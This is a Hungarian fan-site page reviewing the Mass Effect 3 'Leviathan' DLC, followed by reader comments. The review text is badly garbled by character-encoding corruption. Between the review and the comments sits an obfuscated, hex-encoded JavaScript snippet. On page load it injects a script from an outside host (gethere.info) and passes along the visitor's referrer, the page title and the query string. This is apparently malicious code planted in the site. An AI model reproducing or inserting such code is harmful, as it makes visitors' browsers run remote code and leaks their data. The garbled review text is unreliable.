Üdvözlünk az SFportal nem hivatalos Mass Effect rajongói oldalán!

Kövess minket!



Vagy kérj e-mail értesítőt!

Enter your email address:

Delivered by FeedBurner

Mass Effect @ Google+

Mass Effect @ Facebook

A hivatalos magyar Mass Effect Facebook oldal

Csatlakozz!

MegA�rkezett az elsA� singple player DLC a Mass Effect 3-hoz, amiben egy, a sorozatban rA�gA?ta emlegetett rejtA�ly, a Leviathan of DisA�nyomA?ba eredhetA?nk, A�s kiderA�thetjA?k a legenda mA�gA�tt rejlA� igazsA?got. Shepard parancsnok A�rdeklA�dA�sA�t kA�nnyen felcsigA?zza az a tA�ny, hogy A?gy tA�nik, a Leviathan kA�pes minden kA?lA�nA�sebb gond nA�lkA?l lelA�ni a Reapereket – a nyomozA?s vA�gA�re rA?adA?sul megismerheti a KaszA?sok hA?ttA�rtA�rtA�netA�t is. Hogy mennyire rA?hellem a Mass Effect 3 befejezA�sA�t, az nem titok – ennek ellenA�re A?gy-ahogy A�lveztem a Leviathant, ami valA?jA?ban egy tA�nyleg viszonylag tisztessA�gesen A�sszerakott kiegA�szA�tA�je a jA?tA�knak. A DLC hA?rom fA�bb kA?ldetA�sbA�l A?ll, nagyjA?bA?l kA�t A?ra alatt ki is jA?tszhatA? az egA�sz.

A kA?ldetA�seket egy kimondottan jA?pofA?ra sikerA?lt nyomozgatA?s vezeti be: egy, a FellegvA?rba berakott A?j helyszA�nen, egy tudomA?nyos laborban kell alaposabban szA�tnA�znA?nk, A�s ott begyA�jtenA?nk a nyomokat, amik majd elvezethetnek a megfelelA� naprendszerbe – ahol remA�lhetA�leg majd felvehetjA?k valami A?ton-mA?don a kapcsolatot a Leviathannal. A laborban valA? nA�zelA�dA�s a Lair of the Shadow BrokerA�DLC-t idA�zi, ahol ugyebA?r Liara cuccai kA�zA�tt kellett szA�tnA�znA?nk – de annA?l egy fokkal A�sszetettebb a dolog. Nem csak simA?n kihA?zkodjuk a fiA?kokat, hA?tha talA?lunk egy cetlit a kA�vetkezA� helyszA�n koordinA?tA?ival: EDI segA�tsA�gA�vel A�ssze is kell vetnA?nk a kA?lA�nbA�zA� begyA�jtA�tt informA?ciA?kat, A�s leszA�kA�tenA?nk a potenciA?lis naprendszerek listA?jA?t. SzA?val, jA?pofa a dolog, legalA?bbis elsA� vA�gigjA?tszA?sra nekem bejA�tt a nyomozA?s szA?l. Nagy kA�rdA�s, hogy mA?sodik, harmadik, negyedik vA�gigjA?tszA?sra is ilyen jA?pofA?nak fog-e hatni, vagy mA?r unalmassA? vA?lik a dolog. ValA?szA�nA�leg olyan A�rzA�sem lesz, mintha egy mA?r megfejtett keresztrejtvA�nyt akarnA�k kisatA�rozni A�s A?jra megoldani A?gy, hogy azA�rt halvA?nyan ottmaradtak a ceruzanyomok is.

Egy DLC persze nem csak a nyomozA?srA?l, hanem az akciA?rA?l is kell, hogy szA?ljon – A�s ebben is tisztessA�geset alkottak a fiA?k-lA?nyok. A teljes ME3 legjobb pA?lyA?i kA�zA� sorolhatA?ak a Leviathan csatA?i: jA?t tesz ezeknek az is, hogy A?tvettek elemeket a multiplayerbA�l is, A?gymint a drA?nkA�sA�rgetA�s A�s a “csomagkiszA?llA�tA?s”, A�gy nem csak natA?rban kell lA�vA�ldA�zni, hanem van egyA�b cA�l is. Asj ellenfA�l nincs a jA?tA�kban, hagyomA?nyos Reaper erA�k prA?bA?lnak megakadA?lyozni minket a Leviathan megtalA?lA?sA?ban – aki gyakran multizik, az nem nagyon fog beleizzadni a harcokba. Bossfightra ne szA?mA�tsunk, mert nincs a DLC-ben ilyen – de a kemA�nyebb ellenfelek, mint a Brute-ok A�s Banshee-k hajlamosak pA?rosA?val jA�nni, mivel pA?rosan szA�p az A�let. JellemzA� mA?don az egyik pA?lyA?n sikerA?lt azutA?n megtalA?lnom a Banshee-k lelA�vA�sA�re odahelyezett rakA�tavetA�t, miutA?n nA�hA?ny biotikus robbanA?ssal lerendeztem A�ket – hiA?ba no, dolgoznak a multis reflexek, egy ilyen csatA?t meg kell tudni oldani rakA�ta nA�lkA?l is. 🙂

A tA�rtA�net szintA�n kimondottan jA?, szA�pen felvezetik a nyomozA?st, A�s tA�nyleg elA�g sok infA?t megtudunk a Reaperek eredetA�rA�l – habA?r nem annyiraA�megdA�bbentA� ez az A?j tudA?s a befejezA�s ismeretA�ben. A hangulat kicsit nyomasztA? – de leginkA?bb a Mass Effect 1 hangulatA?ra hajaz. SikerA?lt visszahozni azt az A�rzA�st, amikor mA�g szinte semmit nem tudtunk a ReaperekrA�l, csak azt, hogy idegenek, fA�lelmetesek, A�s belA?thatatlan hatalmuk van – nos, ugyanez jellemzA� a Leviathanra is. A Mass Effect 2-es DLC-k kapcsA?n felmerA?lt legnagyobb kritikA?t is most kikerA?lte a Bioware: a Leviathanra valamennyi csapattA?rsunk szinkonhangjA?t visszahoztA?k, mindenkinek van sajA?t szA�vege a DLC-ben. EDI-nek mA�g tA�bb is, hiszen a laboros nyomkeresA�sben A� a mi kis szintetikus Dr. Watsonunk, aki segA�t A�sszerakni a kA�pet.

A sztori A�s a hangulat tehA?t szintA�n jA? – az egyetlen problA�ma az ismA�telten csak a Mass Effect 3 vA�gjA?tA�ka. Akinek nem tetszett a trilA?gia lezA?rA?sa, az meglehetA�sen alulmotivA?lt lesz a Leviathan vA�gigjA?tszA?sa kapcsA?n: minek vele vacakolni, amikor A�gy is, A?gy is ugyanabbA?l az elcseszett 3+1 befejezA�sbA�l fogunk tudni vA?lasztani? A befejezA�sen rA?adA?sul mA�g egy fokot ront is a Leviathan – a ReaperekrA�l megtudott informA?ciA?k tA?krA�ben, ha lehetsA�ges, mA�g kevA�sbA� hajlamos megbA�zni az ember a Catalystban. A vA�gsA� beszA�lgetA�s egyA�bkA�nt minimA?lisan, de vA?ltozik attA?l fA?ggA�en, hogy megcsinA?ltuk-e a Leviathan DLC-t – ez azonban egy-kA�t mondatot jelent csak, A�s A�rtelemszerA�en a vA�gsA� opciA?kon nem mA?dosA�t.

Akinek tetszett a Mass Effect 3 vA�ge, vagy legalA?bbis elfogadta azt, esetleg sikeresen tA?ltette magA?t rajta, annak bA?tran ajA?nlom a Leviathant. A�rdekes, izgalmas kiegA�szA�tA�, a Mass Effect DLC-k sorA?nak egyik legjobb darabja.

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Leviathan DLC teszt bejegyzéshez 424 hozzászólás

  • Scoo Sama szerint:

    Nekem annyira nem jött be sajnos. Túl sok volt az unalmas oda-vissza repülgetés a laborba. Ráadásul szerintem szinte semmi újat nem tudtunk meg, hiszen a Chil már elmondott majdnem mindent. Az lett volna jó, ha ez alapból benne lett volna a játékban, mert akkor érezhető lett volna, hogy rendesen elő van készítve a Child érkezése, nem csak úgy egyik pillanatból a másikba jelenik meg, mi meg nézünk mit a moziba, hogy ez miez?! Plusz milyen nagy kihagyott ziccer, hogy nincs harc a víz alatt!

  • dzsejt szerint:

    Engem a bugok bosszantottak. Az egyik pályán alig lehet lejutni egy létrán, egy másikon Shepard átképezte magát Supermanná, néhol, ahol meg át kéne ugrani, nem lehet akárhol… 🙁
    De ezt leszámítva nagyon bejött. A keresgélés nekem második nekifutásra is tetszett, bár mivel először félálomba játszottam végig, így másodikra figyeltem inkább oda, olyan volt, mintha először játszanám. 😀 Azért trükkösek a Bioware fiúk-lányok, mert voltaképpen egyetlen nyomot elég megtalálni, és máris mehetünk a dolgunkra, így aki később nem akar minden szart átnézni, annak nem kell tökölnie.
    A Kaszásokról mondjuk tényleg nem tudunk meg sok újat (lehetett volna még egyáltalán?), de jó volt megismerni a múltjukat. Honnan van a formájuk, kik és miért jutottak arra az elhatározásra, hogy megalkossák CsillagFütyit (aki mellesleg elő van készítve, hisz már Thessián konkretizálja Vendetta, hogy van valami, ami irányítja a Kaszásokat). Szerencsére ebben a beszélgetésben sem rejtik véka alá, hogy iszonyúra melléfogtak Leviék ezzel az akármivel (noha az tényleg azt teszi, ami a dolga). Ez van, sok balfasz van a Mass Effect univerzumában, most még egy betársult a quarianok, a Cerberus, a Tanács és a többiek mellé. De hát ha mindenki gondolkodna, Shepardnak mi dolga maradna. 😀
    Külön öröm, hogy a csapattársak ezúttal tényleg nem voltak némák. Ezt nagyon rühelltem az ME2 DLC-iben, Bár félek, hogy ez nem egy új tendencia, hanem csak kihasználták, hogy az EC DLC-re amúgy is be kellett rendelni majdnem mindenkit, így egy füst alatt ezt is lerendezték. Mert például Joker egy szót sem szól, ugyanúgy, mint az EC-ben, ergo Seth Greent nem hívták vissza, ezért nem szerepel itt sem. De ne legyen igazam (egyszer a változatosság kedvéért 😎 ).
    Ami még kicsit megtörte a mosolyom, hogy vártam volna a végére valami epikusat. Erre egy snassz energiahullámmal le lett tudva még az az egy Kaszás is. Pedig egy egy-egy elleni harc, vagy egy Leviathan-Kaszás beszélgetés, valami hasonló még adott volna valami pluszt.
    Ja, és ez még mindig a harmadik single DLC, nem az első. 😉

  • Merras szerint:

    Nekem ez az első DLC.

    Az Extended Cut az szvsz egy közepes bugfix, ami pont a fő problémát nem javította, és valszeg egy jelentős része amúgy is olyan, amit már elkészítettek, csak időhiány miatt nem került bele a játékba eredetileg. Az ilyen extra fegyver / extra bizbasz meg nekem nem SP DLC. 😀

    • dzsejt szerint:

      Hát attól, hogy neked mi, az egy dolog, de attól ez a valóságban a harmadik SP DLC. Pláne, hogy ott a From Ashes is, ami azért nem csak extra puska, extra bizbasz, bár Javik belefér a bizbasz kategóriába. 🙂

      Az ízlésedet meg semmilyen bugfix, DLC, patch, expansio, nem tudja kijavítani. 😛 Bár lehet, hogy egy üveg pálinka igen. Akkor CsillagTöki még élőben is megjelenhet akár. Az de komoly lenne. 😆

  • Ghostlead8 szerint:

    Merras! Mit értesz az alatt, hogy kevésbé fogunk megbízni a Catalyst-ben pontosan?

    • Coloman szerint:

      Mivel elárulta a Leviathanokat, így megteheti velünk is a nyájas beszéd ellenére. Illetve, hogy látszólag a kezünkbe adja a végső döntést.

  • StarOfFlames szerint:

    Egy újabb negatív utalás a Mass Effect 3 végére. Kérem szépen, a Mass Effect-et szerény véleményem szerint a végkifejlet teljesen a magas sci-fi műfajába emeli. Mindegyik végjátékban van dráma és áldozat, és a tragédia mellett tanulság és remény is. Még nem volt alkalmam az Extended Cut befejezésére, de két (rövid) véget láttam, a Denial és a Destroy endinget. A Mass Effect hozzányúl néhány olyan mély kérdéshez, ami az igazi, komoly science fiction lényegét adja, és a játékosra hagyja, hogy válaszoljon rájuk. Ez az első komoly játék, ami utoléri a sci-fi irodalom színvonalát, Az első interaktív eposz, ami teljesen képes bevonni és újat tanítani nekünk. A Mass Effect 3 végéhez fel kell nőni, ez az én véleményem.